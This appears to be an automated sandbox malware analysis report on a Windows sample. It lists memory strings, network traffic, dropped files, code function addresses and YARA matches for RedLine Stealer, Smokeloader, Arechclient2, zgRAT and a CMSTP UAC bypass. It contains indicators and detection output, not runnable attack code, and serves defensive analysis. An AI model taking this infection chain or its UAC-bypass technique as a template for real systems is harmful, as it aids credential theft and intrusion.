                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37CB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37CB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37AAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/eula/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/eula/?
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37947000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/privacy/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/privacy/?
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/dHh0
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                            Source: unknownHTTPS traffic detected: 185.93.1.244:443 -> 192.168.2.5:49726 version: TLS 1.2

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 6.2.UniversalInstaller.exe.3bbe15b.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 5.2.UniversalInstaller.exe.34ec86d.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 21.2.cmd.exe.53c00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 21.2.cmd.exe.4dca976.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 20.2.UniversalInstaller.exe.373b15b.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 7.2.cmd.exe.53ab264.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 7.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 7.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 5.2.UniversalInstaller.exe.3530d5b.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 21.2.cmd.exe.4e0ee64.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 20.2.UniversalInstaller.exe.373bd5b.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 5.2.UniversalInstaller.exe.353015b.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 21.2.cmd.exe.4e0e264.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 20.2.UniversalInstaller.exe.36f786d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 6.2.UniversalInstaller.exe.3bbed5b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 21.2.cmd.exe.53c00c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 7.2.cmd.exe.5367976.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 24.2.MSBuild.exe.a00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 7.2.cmd.exe.53abe64.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3514d525.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 6.2.UniversalInstaller.exe.3b7a86d.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e35198739.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e247a3.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e1537d.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e34dad.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3517432f.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                            Source: 00000002.00000002.2435628438.00000000043ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                            Source: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                            Source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\fak, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7AB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C7AB700
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7AB8C0 rand_s,NtQueryVirtualMemory,2_2_6C7AB8C0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7AB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,2_2_6C7AB910
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C74F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C74F280
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_0040EA54 NtQuerySystemInformation,4_2_0040EA54
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0041B84B0_2_0041B84B
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0040BA800_2_0040BA80
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0040C2AC0_2_0040C2AC
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_004123A00_2_004123A0
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0040F4410_2_0040F441
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0040BD2A0_2_0040BD2A
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0042153C0_2_0042153C
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0040C6A00_2_0040C6A0
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_004087610_2_00408761
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0041BF690_2_0041BF69
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0040B70E0_2_0040B70E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0040BFF10_2_0040BFF1
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0420BCE70_2_0420BCE7
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0420C5130_2_0420C513
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042126070_2_04212607
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0420F6A80_2_0420F6A8
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0420BF910_2_0420BF91
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0420C9070_2_0420C907
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0420B9750_2_0420B975
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042089C80_2_042089C8
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0420C2580_2_0420C258
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0421BAB20_2_0421BAB2
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7435A02_2_6C7435A0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7554772_2_6C755477
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7B545C2_2_6C7B545C
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7B542B2_2_6C7B542B
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C785C102_2_6C785C10
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7BAC002_2_6C7BAC00
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C786CF02_2_6C786CF0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C74D4E02_2_6C74D4E0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C76D4D02_2_6C76D4D0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7564C02_2_6C7564C0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7A34A02_2_6C7A34A0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7AC4A02_2_6C7AC4A0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C756C802_2_6C756C80
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7705122_2_6C770512
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C76ED102_2_6C76ED10
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C75FD002_2_6C75FD00
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7A85F02_2_6C7A85F0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C780DD02_2_6C780DD0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C74C6702_2_6C74C670
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7B6E632_2_6C7B6E63
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C769E502_2_6C769E50
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C783E502_2_6C783E50
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7646402_2_6C764640
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C792E4E2_2_6C792E4E
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7A9E302_2_6C7A9E30
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C787E102_2_6C787E10
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7956002_2_6C795600
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C74BEF02_2_6C74BEF0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C75FEF02_2_6C75FEF0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7B76E32_2_6C7B76E3
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7A4EA02_2_6C7A4EA0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C765E902_2_6C765E90
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7AE6802_2_6C7AE680
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7877102_2_6C787710
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C759F002_2_6C759F00
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C776FF02_2_6C776FF0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C74DFE02_2_6C74DFE0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7977A02_2_6C7977A0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C78F0702_2_6C78F070
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7688502_2_6C768850
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C76D8502_2_6C76D850
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C78B8202_2_6C78B820
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7948202_2_6C794820
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7578102_2_6C757810
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C76C0E02_2_6C76C0E0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7858E02_2_6C7858E0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7B50C72_2_6C7B50C7
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7760A02_2_6C7760A0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C79B9702_2_6C79B970
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7BB1702_2_6C7BB170
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C75D9602_2_6C75D960
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C76A9402_2_6C76A940
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C77D9B02_2_6C77D9B0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C74C9A02_2_6C74C9A0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7851902_2_6C785190
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7A29902_2_6C7A2990
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C789A602_2_6C789A60
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C761AF02_2_6C761AF0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C78E2F02_2_6C78E2F0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C788AC02_2_6C788AC0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C75CAB02_2_6C75CAB0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7B2AB02_2_6C7B2AB0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7422A02_2_6C7422A0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C774AA02_2_6C774AA0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7BBA902_2_6C7BBA90
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C75C3702_2_6C75C370
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7453402_2_6C745340
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7B53C82_2_6C7B53C8
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C74F3802_2_6C74F380
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7FAC602_2_6C7FAC60
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C84ECD02_2_6C84ECD0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C8B6C002_2_6C8B6C00
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C8CAC302_2_6C8CAC30
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7EECC02_2_6C7EECC0
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 004275A4 appears 43 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 04201D46 appears 39 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 04209F27 appears 48 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 042036F8 appears 130 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 00409CC0 appears 48 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 04201BE3 appears 40 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 0422780B appears 43 times
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: String function: 004043B0 appears 316 times
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: String function: 6C77CBE8 appears 134 times
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: String function: 6C7894D0 appears 88 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 1124
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \OriginalFileName vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000002.2435145473.00000000043A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFires( vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000002.2425971377.0000000004047000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFires( vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2057767194.0000000005DEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFires( vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2264464647.000000000434A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFires( vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBCClipboard.exe> vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 6.2.UniversalInstaller.exe.3bbe15b.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
